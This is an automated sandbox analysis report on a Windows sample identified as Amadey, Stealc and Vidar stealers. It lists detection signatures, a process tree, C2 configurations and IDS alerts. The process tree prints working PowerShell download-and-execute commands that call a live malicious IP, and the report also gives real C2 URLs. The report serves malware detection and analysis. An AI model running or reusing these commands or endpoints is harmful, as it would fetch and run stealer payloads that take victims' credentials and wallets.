Windows
Analysis Report
file.exe
Overview
General Information
Detection
Amadey, Stealc, Vidar
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Classification
- System is w10x64
- file.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
  - cmd.exe (PID: 2056 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsAAAEBAFBGI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - DocumentsAAAEBAFBGI.exe (PID: 2156 cmdline: "C:\Users\user\DocumentsAAAEBAFBGI.exe" MD5: 12673BCEC0FD27C1931789A78B249FE4)
  - skotes.exe (PID: 7428 cmdline: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 12673BCEC0FD27C1931789A78B249FE4)
  - bd0759338a.exe (PID: 8824 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000023001\bd0759338a.exe" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
  - 0bb986841b.exe (PID: 7504 cmdline: "C:\Users\user\1000026002\0bb986841b.exe" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
  - 31b0d64927.exe (PID: 9516 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000028001\31b0d64927.exe" MD5: F226001BA9FF27C6D4C89D8B800DEB73)
  - chrome.exe (PID: 9804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 10000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1964,i,7675027759563180752,13528081914189231466,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - powershell.exe (PID: 10100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user~1\AppData\Local\Temp\1000030041\do.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 10108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 9288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - msedge.exe (PID: 9316 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)
  - powershell.exe (PID: 2940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user~1\AppData\Local\Temp\1000031141\no.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 9964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 7188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - msedge.exe (PID: 2692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)
  - powershell.exe (PID: 9724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000032042\ko.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 3604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd --kiosk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 11208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1992,i,9743376680113273918,3905610129533083209,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000033142\so.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 10336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd --kiosk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 5808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2044,i,7061949694861762144,2662107828499649391,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - powershell.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://185.215.113.103/test/do.ps1')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 2008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 4220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 --field-trial-handle=1772,i,14341214799832868158,9564847120643716952,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 10920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5792 --field-trial-handle=1772,i,14341214799832868158,9564847120643716952,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 10928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=1772,i,14341214799832868158,9564847120643716952,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - msedge.exe (PID: 6156 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 1848 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1040 --field-trial-handle=1452,i,291692599671157663,15554877250791269440,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - powershell.exe (PID: 3020 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://185.215.113.103/test/no.ps1')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 3924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 4196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1932,i,2627472456794200823,15753712836715350859,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - msedge.exe (PID: 5420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)
  - powershell.exe (PID: 2384 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://185.215.113.103/test/ko.ps1')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd --kiosk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 1888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1964,i,16374312481175499417,14952108955569029805,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - powershell.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://185.215.113.103/test/so.ps1')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chrome.exe (PID: 4600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd --kiosk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 9004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=596 --field-trial-handle=2004,i,17077749247032151328,13584328385297399515,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- svchost.exe (PID: 7488 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://youtube.com/account https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 8136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 8436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7084 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 5924 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7260 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 9644 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=8232 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 9652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8376 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  - msedge.exe (PID: 7576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=9328 --field-trial-handle=2108,i,15015803418867883182,14339705185440723176,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- skotes.exe (PID: 7212 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 12673BCEC0FD27C1931789A78B249FE4)
- 0bb986841b.exe (PID: 7036 cmdline: "C:\Users\user\1000026002\0bb986841b.exe" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
- 31b0d64927.exe (PID: 7368 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000028001\31b0d64927.exe" MD5: F226001BA9FF27C6D4C89D8B800DEB73)
  - chrome.exe (PID: 10372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 10680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1878605718583745922,720116511989594910,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- 0bb986841b.exe (PID: 11168 cmdline: "C:\Users\user\1000026002\0bb986841b.exe" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
- 31b0d64927.exe (PID: 11040 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000028001\31b0d64927.exe" MD5: F226001BA9FF27C6D4C89D8B800DEB73)
  - chrome.exe (PID: 4592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 1916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1812,i,14447262195796531449,1825466906946727723,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | |
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | | |
Vidar | Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser. | No Attribution | | |
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security | |
 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security | |
 | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security | |
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary (Sigma rule authors) |
---|
Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing |
Florian Roth (Nextron Systems) |
Florian Roth (Nextron Systems) |
Florian Roth (Nextron Systems) |
Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro |
Florian Roth (Nextron Systems) |
Nasreddine Bencherchali (Nextron Systems) |
James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger |
frack113, Nasreddine Bencherchali |
Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
vburov |
Data Obfuscation (Sigma rule authors) |
---|
Joe Security |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-28T01:13:52.195233+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49791 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:13:57.322181+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49808 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:14:01.029105+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49830 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:14:04.289247+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49846 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:14:08.116691+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49856 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:14:11.443808+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49865 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:13:06.633438+0200 | 2044245 | 1 | Malware Command and Control Activity Detected | 185.215.113.37 | 80 | 192.168.2.7 | 49699 | TCP |
2024-09-28T01:13:06.626260+0200 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:06.854983+0200 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:07.854220+0200 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:06.863192+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 185.215.113.37 | 80 | 192.168.2.7 | 49699 | TCP |
2024-09-28T01:13:06.396516+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:58.971213+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49817 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:14:25.023183+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49917 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:14:36.198509+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49950 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:14:45.778243+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49975 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:48.153396+0200 | 2856121 | 1 | A Network Trojan was detected | 192.168.2.7 | 49786 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:13:39.050479+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 49736 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:18:52.241539+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 50245 | 185.215.113.43 | 80 | TCP |
2024-09-28T01:13:47.452305+0200 | 2856122 | 1 | A Network Trojan was detected | 185.215.113.43 | 80 | 192.168.2.7 | 49745 | TCP |
2024-09-28T01:13:42.385842+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49746 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:13:53.237969+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49795 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:13:58.394181+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49815 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:14:01.767334+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49833 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:14:05.003838+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49849 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:14:08.965499+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49858 | 185.215.113.103 | 80 | TCP |
2024-09-28T01:13:08.586930+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:14.430106+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:15.698192+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:16.334270+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:16.865362+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:18.536546+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:19.230981+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
2024-09-28T01:13:22.715881+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 185.215.113.103 | 80 | TCP |
AV Detection (signature sources) |
---|
Avira |
Malware Configuration Extractor |
ReversingLabs |
Integrated Neural Analysis Model |
Joe Sandbox ML |
Code function: 0_2_6CEB6C80 |
Static PE information |
HTTPS traffic detected |
Binary string |
File opened |
Networking (signature sources) |
---|
Suricata IDS |
URLs |
IPs |
HTTP traffic detected |